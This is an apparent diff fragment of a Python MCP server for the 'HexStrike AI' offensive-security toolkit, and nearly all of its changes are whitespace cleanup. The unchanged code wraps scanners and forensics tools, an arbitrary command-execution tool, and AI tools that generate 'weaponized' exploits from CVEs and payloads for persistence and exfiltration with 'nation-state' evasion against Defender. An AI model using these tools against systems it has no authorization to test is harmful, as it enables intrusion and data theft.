failed") - + return result @mcp.tool() def api_schema_analyzer(schema_url: str, schema_type: str = "openapi") -> Dict[str, Any]: """ Analyze API schemas and identify potential security issues. - + Args: schema_url: URL to the API schema (OpenAPI/Swagger/GraphQL) schema_type: Type of schema (openapi, swagger, graphql) - + Returns: Schema analysis results with security issues and recommendations """ @@ -3070,24 +3070,24 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "schema_url": schema_url, "schema_type": schema_type } - + logger.info(f"๐Ÿ” Starting API schema analysis: {schema_url}") result = hexstrike_client.safe_post("api/tools/api_schema_analyzer", data) - + if result.get("success"): analysis = result.get("schema_analysis_results", {}) endpoint_count = len(analysis.get("endpoints_found", [])) issue_count = len(analysis.get("security_issues", [])) - + logger.info(f"โœ… Schema analysis completed: {endpoint_count} endpoints, {issue_count} issues") - + if issue_count > 0: logger.warning(f"โš ๏ธ Found {issue_count} security issues in schema!") for issue in analysis.get("security_issues", [])[:3]: # Show first 3 severity = issue.get("severity", "UNKNOWN") issue_type = issue.get("issue", "unknown") logger.warning(f" โ”œโ”€ [{severity}] {issue_type}") - + if endpoint_count > 0: logger.info(f"๐Ÿ“Š Discovered endpoints:") for endpoint in analysis.get("endpoints_found", [])[:5]: # Show first 5 @@ -3096,20 +3096,20 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f" โ”œโ”€ {method} {path}") else: logger.error("โŒ Schema analysis failed") - + return result @mcp.tool() def comprehensive_api_audit(base_url: str, schema_url: str = "", jwt_token: str = "", graphql_endpoint: str = "") -> Dict[str, Any]: """ Comprehensive API security audit combining multiple testing techniques. - + Args: base_url: Base URL of the API schema_url: Optional API schema URL jwt_token: Optional JWT token for analysis graphql_endpoint: Optional GraphQL endpoint - + Returns: Comprehensive audit results with all API security tests """ @@ -3121,16 +3121,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "summary": {}, "recommendations": [] } - + logger.info(f"๐Ÿš€ Starting comprehensive API security audit: {base_url}") - + # 1. API Endpoint Fuzzing logger.info("๐Ÿ” Phase 1: API endpoint discovery and fuzzing") fuzz_result = self.api_fuzzer(base_url) if fuzz_result.get("success"): audit_results["tests_performed"].append("api_fuzzing") audit_results["api_fuzzing"] = fuzz_result - + # 2. Schema Analysis (if provided) if schema_url: logger.info("๐Ÿ” Phase 2: API schema analysis") @@ -3138,10 +3138,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if schema_result.get("success"): audit_results["tests_performed"].append("schema_analysis") audit_results["schema_analysis"] = schema_result - + schema_data = schema_result.get("schema_analysis_results", {}) audit_results["total_vulnerabilities"] += len(schema_data.get("security_issues", [])) - + # 3. JWT Analysis (if provided) if jwt_token: logger.info("๐Ÿ” Phase 3: JWT token analysis") @@ -3149,10 +3149,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if jwt_result.get("success"): audit_results["tests_performed"].append("jwt_analysis") audit_results["jwt_analysis"] = jwt_result - + jwt_data = jwt_result.get("jwt_analysis_results", {}) audit_results["total_vulnerabilities"] += len(jwt_data.get("vulnerabilities", [])) - + # 4. GraphQL Testing (if provided) if graphql_endpoint: logger.info("๐Ÿ” Phase 4: GraphQL security scanning") @@ -3160,10 +3160,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if graphql_result.get("success"): audit_results["tests_performed"].append("graphql_scanning") audit_results["graphql_scanning"] = graphql_result - + graphql_data = graphql_result.get("graphql_scan_results", {}) audit_results["total_vulnerabilities"] += len(graphql_data.get("vulnerabilities", [])) - + # Generate comprehensive recommendations audit_results["recommendations"] = [ "Implement proper authentication and authorization", @@ -3175,19 +3175,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "Keep API documentation updated and secure", "Implement proper error handling" ] - + # Summary audit_results["summary"] = { "tests_performed": len(audit_results["tests_performed"]), "total_vulnerabilities": audit_results["total_vulnerabilities"], "audit_coverage": "comprehensive" if len(audit_results["tests_performed"]) >= 3 else "partial" } - + logger.info(f"โœ… Comprehensive API audit completed:") logger.info(f" โ”œโ”€ Tests performed: {audit_results['summary']['tests_performed']}") logger.info(f" โ”œโ”€ Total vulnerabilities: {audit_results['summary']['total_vulnerabilities']}") logger.info(f" โ””โ”€ Coverage: {audit_results['summary']['audit_coverage']}") - + return { "success": True, "comprehensive_audit": audit_results @@ -3201,13 +3201,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def volatility3_analyze(memory_file: str, plugin: str, output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Volatility3 for advanced memory forensics with enhanced logging. - + Args: memory_file: Path to memory dump file plugin: Volatility3 plugin to execute output_file: Output file path additional_args: Additional Volatility3 arguments - + Returns: Advanced memory forensics results """ @@ -3229,13 +3229,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def foremost_carving(input_file: str, output_dir: str = "/tmp/foremost_output", file_types: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Foremost for file carving with enhanced logging. - + Args: input_file: Input file or device to carve output_dir: Output directory for carved files file_types: File types to carve (jpg,gif,png,etc.) additional_args: Additional Foremost arguments - + Returns: File carving results """ @@ -3257,7 +3257,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def steghide_analysis(action: str, cover_file: str, embed_file: str = "", passphrase: str = "", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Steghide for steganography analysis with enhanced logging. - + Args: action: Action to perform (extract, embed, info) cover_file: Cover file for steganography @@ -3265,7 +3265,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: passphrase: Passphrase for steganography output_file: Output file path additional_args: Additional Steghide arguments - + Returns: Steganography analysis results """ @@ -3289,13 +3289,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def exiftool_extract(file_path: str, output_format: str = "", tags: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute ExifTool for metadata extraction with enhanced logging. - + Args: file_path: Path to file for metadata extraction output_format: Output format (json, xml, csv) tags: Specific tags to extract additional_args: Additional ExifTool arguments - + Returns: Metadata extraction results """ @@ -3317,14 +3317,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def hashpump_attack(signature: str, data: str, key_length: str, append_data: str, additional_args: str = "") -> Dict[str, Any]: """ Execute HashPump for hash length extension attacks with enhanced logging. - + Args: signature: Original hash signature data: Original data key_length: Length of secret key append_data: Data to append additional_args: Additional HashPump arguments - + Returns: Hash length extension attack results """ @@ -3351,16 +3351,23 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def hakrawler_crawl(url: str, depth: int = 2, forms: bool = True, robots: bool = True, sitemap: bool = True, wayback: bool = False, additional_args: str = "") -> Dict[str, Any]: """ Execute Hakrawler for web endpoint discovery with enhanced logging. - + + Note: Uses standard Kali Linux hakrawler (hakluke/hakrawler) with parameter mapping: + - url: Piped via echo to stdin (not -url flag) + - depth: Mapped to -d flag (not -depth) + - forms: Mapped to -s flag for showing sources + - robots/sitemap/wayback: Mapped to -subs for subdomain inclusion + - Always includes -u for unique URLs + Args: url: Target URL to crawl - depth: Crawling depth - forms: Include forms in crawling - robots: Check robots.txt - sitemap: Check sitemap.xml - wayback: Use Wayback Machine + depth: Crawling depth (mapped to -d) + forms: Include forms in crawling (mapped to -s) + robots: Check robots.txt (mapped to -subs) + sitemap: Check sitemap.xml (mapped to -subs) + wayback: Use Wayback Machine (mapped to -subs) additional_args: Additional Hakrawler arguments - + Returns: Web endpoint discovery results """ @@ -3385,7 +3392,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def httpx_probe(targets: str = "", target_file: str = "", ports: str = "", methods: str = "GET", status_code: str = "", content_length: bool = False, output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute HTTPx for HTTP probing with enhanced logging. - + Args: targets: Target URLs or IPs target_file: File containing targets @@ -3395,7 +3402,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: content_length: Show content length output_file: Output file path additional_args: Additional HTTPx arguments - + Returns: HTTP probing results """ @@ -3421,14 +3428,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def paramspider_discovery(domain: str, exclude: str = "", output_file: str = "", level: int = 2, additional_args: str = "") -> Dict[str, Any]: """ Execute ParamSpider for parameter discovery with enhanced logging. - + Args: domain: Target domain exclude: Extensions to exclude output_file: Output file path level: Crawling level additional_args: Additional ParamSpider arguments - + Returns: Parameter discovery results """ @@ -3455,7 +3462,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def burpsuite_scan(project_file: str = "", config_file: str = "", target: str = "", headless: bool = False, scan_type: str = "", scan_config: str = "", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Burp Suite with enhanced logging. - + Args: project_file: Burp project file path config_file: Burp configuration file path @@ -3465,7 +3472,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: scan_config: Scan configuration output_file: Output file path additional_args: Additional Burp Suite arguments - + Returns: Burp Suite scan results """ @@ -3491,7 +3498,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def zap_scan(target: str = "", scan_type: str = "baseline", api_key: str = "", daemon: bool = False, port: str = "8090", host: str = "0.0.0.0", format_type: str = "xml", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute OWASP ZAP with enhanced logging. - + Args: target: Target URL scan_type: Type of scan (baseline, full, api) @@ -3502,7 +3509,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: format_type: Output format (xml, json, html) output_file: Output file path additional_args: Additional ZAP arguments - + Returns: ZAP scan results """ @@ -3529,7 +3536,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def arjun_scan(url: str, method: str = "GET", data: str = "", headers: str = "", timeout: str = "", output_file: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute Arjun for parameter discovery with enhanced logging. - + Args: url: Target URL method: HTTP method (GET, POST, etc.) @@ -3538,7 +3545,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: timeout: Request timeout output_file: Output file path additional_args: Additional Arjun arguments - + Returns: Parameter discovery results """ @@ -3563,11 +3570,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def wafw00f_scan(target: str, additional_args: str = "") -> Dict[str, Any]: """ Execute wafw00f to identify and fingerprint WAF products with enhanced logging. - + Args: target: Target URL or IP additional_args: Additional wafw00f arguments - + Returns: WAF detection results """ @@ -3587,12 +3594,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def fierce_scan(domain: str, dns_server: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute fierce for DNS reconnaissance with enhanced logging. - + Args: domain: Target domain dns_server: DNS server to use additional_args: Additional fierce arguments - + Returns: DNS reconnaissance results """ @@ -3613,13 +3620,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def dnsenum_scan(domain: str, dns_server: str = "", wordlist: str = "", additional_args: str = "") -> Dict[str, Any]: """ Execute dnsenum for DNS enumeration with enhanced logging. - + Args: domain: Target domain dns_server: DNS server to use wordlist: Wordlist for brute forcing additional_args: Additional dnsenum arguments - + Returns: DNS enumeration results """ @@ -3681,7 +3688,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: ) -> Dict[str, Any]: """ Execute AutoRecon for comprehensive target enumeration with full parameter support. - + Args: target: Single target to scan target_file: File containing multiple targets @@ -3722,7 +3729,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: global_password_wordlist: Global password wordlist global_domain: Global domain additional_args: Additional AutoRecon arguments - + Returns: Comprehensive enumeration results with full configurability """ @@ -3778,12 +3785,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # SYSTEM MONITORING & TELEMETRY # ============================================================================ - + @mcp.tool() def server_health() -> Dict[str, Any]: """ Check the health status of the HexStrike AI server. - + Returns: Server health information with tool availability and telemetry """ @@ -3799,7 +3806,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def get_cache_stats() -> Dict[str, Any]: """ Get cache statistics from the HexStrike AI server. - + Returns: Cache performance statistics """ @@ -3813,7 +3820,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def clear_cache() -> Dict[str, Any]: """ Clear the cache on the HexStrike AI server. - + Returns: Cache clear operation results """ @@ -3829,7 +3836,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def get_telemetry() -> Dict[str, Any]: """ Get system telemetry from the HexStrike AI server. - + Returns: System performance and usage telemetry """ @@ -3838,7 +3845,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if "commands_executed" in result: logger.info(f"๐Ÿ“Š Commands executed: {result.get('commands_executed', 0)}") return result - + # ============================================================================ # PROCESS MANAGEMENT TOOLS (v5.0 ENHANCEMENT) # ============================================================================ @@ -3847,7 +3854,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def list_active_processes() -> Dict[str, Any]: """ List all active processes on the HexStrike AI server. - + Returns: List of active processes with their status and progress """ @@ -3863,10 +3870,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def get_process_status(pid: int) -> Dict[str, Any]: """ Get the status of a specific process. - + Args: pid: Process ID to check - + Returns: Process status information including progress and runtime """ @@ -3882,10 +3889,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def terminate_process(pid: int) -> Dict[str, Any]: """ Terminate a specific running process. - + Args: pid: Process ID to terminate - + Returns: Success status of the termination operation """ @@ -3901,10 +3908,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def pause_process(pid: int) -> Dict[str, Any]: """ Pause a specific running process. - + Args: pid: Process ID to pause - + Returns: Success status of the pause operation """ @@ -3920,10 +3927,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def resume_process(pid: int) -> Dict[str, Any]: """ Resume a paused process. - + Args: pid: Process ID to resume - + Returns: Success status of the resume operation """ @@ -3939,7 +3946,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def get_process_dashboard() -> Dict[str, Any]: """ Get enhanced process dashboard with visual status indicators. - + Returns: Real-time dashboard with progress bars, system metrics, and process status """ @@ -3948,7 +3955,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: if result.get("success", True) and "total_processes" in result: total = result.get("total_processes", 0) logger.info(f"โœ… Dashboard retrieved: {total} active processes") - + # Log visual summary for better UX if total > 0: logger.info("๐Ÿ“ˆ Active Processes Summary:") @@ -3957,16 +3964,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: else: logger.error("โŒ Failed to get process dashboard") return result - + @mcp.tool() def execute_command(command: str, use_cache: bool = True) -> Dict[str, Any]: """ Execute an arbitrary command on the HexStrike AI server with enhanced logging. - + Args: command: The command to execute use_cache: Whether to use caching for this command - + Returns: Command execution results with enhanced telemetry """ @@ -3981,13 +3988,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "stdout": "", "stderr": f"Error executing command: {result['error']}" } - + if result.get("success"): execution_time = result.get("execution_time", 0) logger.info(f"โœ… Command completed successfully in {execution_time:.2f}s") else: logger.warning(f"โš ๏ธ Command completed with errors") - + return result except Exception as e: logger.error(f"๐Ÿ’ฅ Error executing command '{command}': {str(e)}") @@ -4006,15 +4013,15 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def monitor_cve_feeds(hours: int = 24, severity_filter: str = "HIGH,CRITICAL", keywords: str = "") -> Dict[str, Any]: """ Monitor CVE databases for new vulnerabilities with AI analysis. - + Args: hours: Hours to look back for new CVEs (default: 24) severity_filter: Filter by CVSS severity - comma-separated values (LOW,MEDIUM,HIGH,CRITICAL,ALL) keywords: Filter CVEs by keywords in description (comma-separated) - + Returns: Latest CVEs with exploitability analysis and threat intelligence - + Example: monitor_cve_feeds(48, "CRITICAL", "remote code execution") """ @@ -4025,29 +4032,29 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿ” Monitoring CVE feeds for last {hours} hours | Severity: {severity_filter}") result = hexstrike_client.safe_post("api/vuln-intel/cve-monitor", data) - + if result.get("success"): cve_count = len(result.get("cve_monitoring", {}).get("cves", [])) exploit_analysis_count = len(result.get("exploitability_analysis", [])) logger.info(f"โœ… Found {cve_count} CVEs with {exploit_analysis_count} exploitability analyses") - + return result @mcp.tool() def generate_exploit_from_cve(cve_id: str, target_os: str = "", target_arch: str = "x64", exploit_type: str = "poc", evasion_level: str = "none") -> Dict[str, Any]: """ Generate working exploits from CVE information using AI-powered analysis. - + Args: cve_id: CVE identifier (e.g., CVE-2024-1234) target_os: Target operating system (windows, linux, macos, any) target_arch: Target architecture (x86, x64, arm, any) exploit_type: Type of exploit to generate (poc, weaponized, stealth) evasion_level: Evasion sophistication (none, basic, advanced) - + Returns: Generated exploit code with testing instructions and evasion techniques - + Example: generate_exploit_from_cve("CVE-2024-1234", "linux", "x64", "weaponized", "advanced") """ @@ -4060,31 +4067,31 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿค– Generating {exploit_type} exploit for {cve_id} | Target: {target_os} {target_arch}") result = hexstrike_client.safe_post("api/vuln-intel/exploit-generate", data) - + if result.get("success"): cve_analysis = result.get("cve_analysis", {}) exploit_gen = result.get("exploit_generation", {}) exploitability = cve_analysis.get("exploitability_level", "UNKNOWN") exploit_success = exploit_gen.get("success", False) - + logger.info(f"๐Ÿ“Š CVE Analysis: {exploitability} exploitability") logger.info(f"๐ŸŽฏ Exploit Generation: {'SUCCESS' if exploit_success else 'FAILED'}") - + return result @mcp.tool() def discover_attack_chains(target_software: str, attack_depth: int = 3, include_zero_days: bool = False) -> Dict[str, Any]: """ Discover multi-stage attack chains for target software with vulnerability correlation. - + Args: target_software: Target software/system (e.g., "Apache HTTP Server", "Windows Server 2019") attack_depth: Maximum number of stages in attack chain (1-5) include_zero_days: Include potential zero-day vulnerabilities in analysis - + Returns: Attack chains with vulnerability combinations, success probabilities, and exploit availability - + Example: discover_attack_chains("Apache HTTP Server 2.4", 4, True) """ @@ -4095,36 +4102,36 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿ”— Discovering attack chains for {target_software} | Depth: {attack_depth} | Zero-days: {include_zero_days}") result = hexstrike_client.safe_post("api/vuln-intel/attack-chains", data) - + if result.get("success"): chains = result.get("attack_chain_discovery", {}).get("attack_chains", []) enhanced_chains = result.get("attack_chain_discovery", {}).get("enhanced_chains", []) - + logger.info(f"๐Ÿ“Š Found {len(chains)} attack chains") if enhanced_chains: logger.info(f"๐ŸŽฏ Enhanced {len(enhanced_chains)} chains with exploit analysis") - + return result @mcp.tool() def research_zero_day_opportunities(target_software: str, analysis_depth: str = "standard", source_code_url: str = "") -> Dict[str, Any]: """ Automated zero-day vulnerability research using AI analysis and pattern recognition. - + Args: target_software: Software to research for vulnerabilities (e.g., "nginx", "OpenSSL") analysis_depth: Depth of analysis (quick, standard, comprehensive) source_code_url: URL to source code repository for enhanced analysis - + Returns: Potential vulnerability areas with exploitation feasibility and research recommendations - + Example: research_zero_day_opportunities("nginx 1.20", "comprehensive", "https://github.com/nginx/nginx") """ if analysis_depth not in ["quick", "standard", "comprehensive"]: analysis_depth = "standard" - + data = { "target_software": target_software, "analysis_depth": analysis_depth, @@ -4132,30 +4139,30 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿ”ฌ Researching zero-day opportunities in {target_software} | Depth: {analysis_depth}") result = hexstrike_client.safe_post("api/vuln-intel/zero-day-research", data) - + if result.get("success"): research = result.get("zero_day_research", {}) potential_vulns = len(research.get("potential_vulnerabilities", [])) risk_score = research.get("risk_assessment", {}).get("risk_score", 0) - + logger.info(f"๐Ÿ“Š Found {potential_vulns} potential vulnerability areas") logger.info(f"๐ŸŽฏ Risk Score: {risk_score}/100") - + return result @mcp.tool() def correlate_threat_intelligence(indicators: str, timeframe: str = "30d", sources: str = "all") -> Dict[str, Any]: """ Correlate threat intelligence across multiple sources with advanced analysis. - + Args: indicators: Comma-separated IOCs (IPs, domains, hashes, CVEs, etc.) timeframe: Time window for correlation (7d, 30d, 90d, 1y) sources: Intelligence sources to query (cve, exploit-db, github, twitter, all) - + Returns: Correlated threat intelligence with attribution, timeline, and threat scoring - + Example: correlate_threat_intelligence("CVE-2024-1234,192.168.1.100,malware.exe", "90d", "all") """ @@ -4163,14 +4170,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: valid_timeframes = ["7d", "30d", "90d", "1y"] if timeframe not in valid_timeframes: timeframe = "30d" - + # Parse indicators indicator_list = [i.strip() for i in indicators.split(",") if i.strip()] - + if not indicator_list: logger.error("โŒ No valid indicators provided") return {"success": False, "error": "No valid indicators provided"} - + data = { "indicators": indicator_list, "timeframe": timeframe, @@ -4178,43 +4185,43 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: } logger.info(f"๐Ÿง  Correlating threat intelligence for {len(indicator_list)} indicators | Timeframe: {timeframe}") result = hexstrike_client.safe_post("api/vuln-intel/threat-feeds", data) - + if result.get("success"): threat_intel = result.get("threat_intelligence", {}) correlations = len(threat_intel.get("correlations", [])) threat_score = threat_intel.get("threat_score", 0) - + logger.info(f"๐Ÿ“Š Found {correlations} threat correlations") logger.info(f"๐ŸŽฏ Overall Threat Score: {threat_score:.1f}/100") - + return result @mcp.tool() def advanced_payload_generation(attack_type: str, target_context: str = "", evasion_level: str = "standard", custom_constraints: str = "") -> Dict[str, Any]: """ Generate advanced payloads with AI-powered evasion techniques and contextual adaptation. - + Args: attack_type: Type of attack (rce, privilege_escalation, persistence, exfiltration, xss, sqli) target_context: Target environment details (OS, software versions, security controls) evasion_level: Evasion sophistication (basic, standard, advanced, nation-state) custom_constraints: Custom payload constraints (size limits, character restrictions, etc.) - + Returns: Advanced payloads with multiple evasion techniques and deployment instructions - + Example: advanced_payload_generation("rce", "Windows 11 + Defender + AppLocker", "nation-state", "max_size:256,no_quotes") """ valid_attack_types = ["rce", "privilege_escalation", "persistence", "exfiltration", "xss", "sqli", "lfi", "ssrf"] valid_evasion_levels = ["basic", "standard", "advanced", "nation-state"] - + if attack_type not in valid_attack_types: attack_type = "rce" - + if evasion_level not in valid_evasion_levels: evasion_level = "standard" - + data = { "attack_type": attack_type, "target_context": target_context, @@ -4224,45 +4231,45 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: logger.info(f"๐ŸŽฏ Generating advanced {attack_type} payload | Evasion: {evasion_level}") if target_context: logger.info(f"๐ŸŽฏ Target Context: {target_context}") - + result = hexstrike_client.safe_post("api/ai/advanced-payload-generation", data) - + if result.get("success"): payload_gen = result.get("advanced_payload_generation", {}) payload_count = payload_gen.get("payload_count", 0) evasion_applied = payload_gen.get("evasion_level", "none") - + logger.info(f"๐Ÿ“Š Generated {payload_count} advanced payloads") logger.info(f"๐Ÿ›ก๏ธ Evasion Level Applied: {evasion_applied}") - + return result @mcp.tool() def vulnerability_intelligence_dashboard() -> Dict[str, Any]: """ Get a comprehensive vulnerability intelligence dashboard with latest threats and trends. - + Returns: Dashboard with latest CVEs, trending vulnerabilities, exploit availability, and threat landscape - + Example: vulnerability_intelligence_dashboard() """ logger.info("๐Ÿ“Š Generating vulnerability intelligence dashboard") - + # Get latest critical CVEs latest_cves = hexstrike_client.safe_post("api/vuln-intel/cve-monitor", { "hours": 24, "severity_filter": "CRITICAL", "keywords": "" }) - + # Get trending attack types trending_research = hexstrike_client.safe_post("api/vuln-intel/zero-day-research", { "target_software": "web applications", "analysis_depth": "quick" }) - + # Compile dashboard dashboard = { "timestamp": time.time(), @@ -4284,7 +4291,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "Review security controls against nation-state level attacks" ] } - + logger.info("โœ… Vulnerability intelligence dashboard generated") return { "success": True, @@ -4295,27 +4302,27 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def threat_hunting_assistant(target_environment: str, threat_indicators: str = "", hunt_focus: str = "general") -> Dict[str, Any]: """ AI-powered threat hunting assistant with vulnerability correlation and attack simulation. - + Args: target_environment: Environment to hunt in (e.g., "Windows Domain", "Cloud Infrastructure") threat_indicators: Known IOCs or suspicious indicators to investigate hunt_focus: Focus area (general, apt, ransomware, insider_threat, supply_chain) - + Returns: Threat hunting playbook with detection queries, IOCs, and investigation steps - + Example: threat_hunting_assistant("Windows Domain", "suspicious_process.exe,192.168.1.100", "apt") """ valid_hunt_focus = ["general", "apt", "ransomware", "insider_threat", "supply_chain"] if hunt_focus not in valid_hunt_focus: hunt_focus = "general" - + logger.info(f"๐Ÿ” Generating threat hunting playbook for {target_environment} | Focus: {hunt_focus}") - + # Parse indicators if provided indicators = [i.strip() for i in threat_indicators.split(",") if i.strip()] if threat_indicators else [] - + # Generate hunting playbook hunting_playbook = { "target_environment": target_environment, @@ -4326,7 +4333,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "threat_scenarios": [], "mitigation_strategies": [] } - + # Environment-specific detection queries if "windows" in target_environment.lower(): hunting_playbook["detection_queries"] = [ @@ -4342,7 +4349,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "Privilege escalation events", "Data exfiltration indicators" ] - + # Focus-specific threat scenarios focus_scenarios = { "apt": [ @@ -4364,14 +4371,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "Access to sensitive systems" ] } - + hunting_playbook["threat_scenarios"] = focus_scenarios.get(hunt_focus, [ "Unauthorized access attempts", "Suspicious process execution", "Network anomalies", "Data access violations" ]) - + # Investigation steps hunting_playbook["investigation_steps"] = [ "1. Validate initial indicators and expand IOC list", @@ -4382,15 +4389,15 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "6. Implement containment measures if threat confirmed", "7. Document findings and update detection rules" ] - + # Correlate with vulnerability intelligence if indicators provided if indicators: logger.info(f"๐Ÿง  Correlating {len(indicators)} indicators with threat intelligence") correlation_result = correlate_threat_intelligence(",".join(indicators), "30d", "all") - + if correlation_result.get("success"): hunting_playbook["threat_correlation"] = correlation_result.get("threat_intelligence", {}) - + logger.info("โœ… Threat hunting playbook generated") return { "success": True, @@ -4400,12 +4407,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: # ============================================================================ # ENHANCED VISUAL OUTPUT TOOLS # ============================================================================ - + @mcp.tool() def get_live_dashboard() -> Dict[str, Any]: """ Get a beautiful live dashboard showing all active processes with enhanced visual formatting. - + Returns: Live dashboard with visual process monitoring and system metrics """ @@ -4421,33 +4428,33 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def create_vulnerability_report(vulnerabilities: str, target: str = "", scan_type: str = "comprehensive") -> Dict[str, Any]: """ Create a beautiful vulnerability report with severity-based styling and visual indicators. - + Args: vulnerabilities: JSON string containing vulnerability data target: Target that was scanned scan_type: Type of scan performed - + Returns: Formatted vulnerability report with visual enhancements """ import json - + try: # Parse vulnerabilities if provided as JSON string if isinstance(vulnerabilities, str): vuln_data = json.loads(vulnerabilities) else: vuln_data = vulnerabilities - + logger.info(f"๐Ÿ“‹ Creating vulnerability report for {len(vuln_data)} findings") - + # Create individual vulnerability cards vulnerability_cards = [] for vuln in vuln_data: card_result = hexstrike_client.safe_post("api/visual/vulnerability-card", vuln) if card_result.get("success"): vulnerability_cards.append(card_result.get("vulnerability_card", "")) - + # Create summary report summary_data = { "target": target, @@ -4455,9 +4462,9 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "tools_used": [scan_type], "execution_time": 0 } - + summary_result = hexstrike_client.safe_post("api/visual/summary-report", summary_data) - + logger.info("โœ… Vulnerability report created successfully") return { "success": True, @@ -4466,7 +4473,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: "total_vulnerabilities": len(vuln_data), "timestamp": summary_result.get("timestamp", "") } - + except Exception as e: logger.error(f"โŒ Failed to create vulnerability report: {str(e)}") return {"success": False, "error": str(e)} @@ -4475,51 +4482,51 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP: def format_tool_output_visual(tool_name: str, output: str, success: bool = True) -> Dict[str, Any]: """ Format tool output with beautiful visual styling, syntax highlighting, and structure. - + Args: tool_name: Name of the security tool output: Raw output from the tool success: Whether the tool execution was successful - + Returns: Beautifully formatted tool output with visual enhancements """ logger.info(f"๐ŸŽจ Formatting output for {tool_name}") - + data = { "tool": tool_name, "output": output, "success": success } - + result = hexstrike_client.safe_post("api/visual/tool-output", data) if result.get("success"): logger.info(f"โœ… Tool output formatted successfully for {tool_name}") else: logger.error(f"โŒ Failed to format tool output for {tool_name}") - + return result @mcp.tool() - def create_scan_summary(target: str, tools_used: str, vulnerabilities_found: int = 0, + def create_scan_summary(target: str, tools_used: str, vulnerabilities_found: int = 0, execution_time: float = 0.0, findings: str = "") -> Dict[str, Any]: """ Create a comprehensive scan summary report with beautiful visual formatting. - + Args: target: Target that was scanned tools_used: Comma-separated list of tools used vulnerabilities_found: Number of 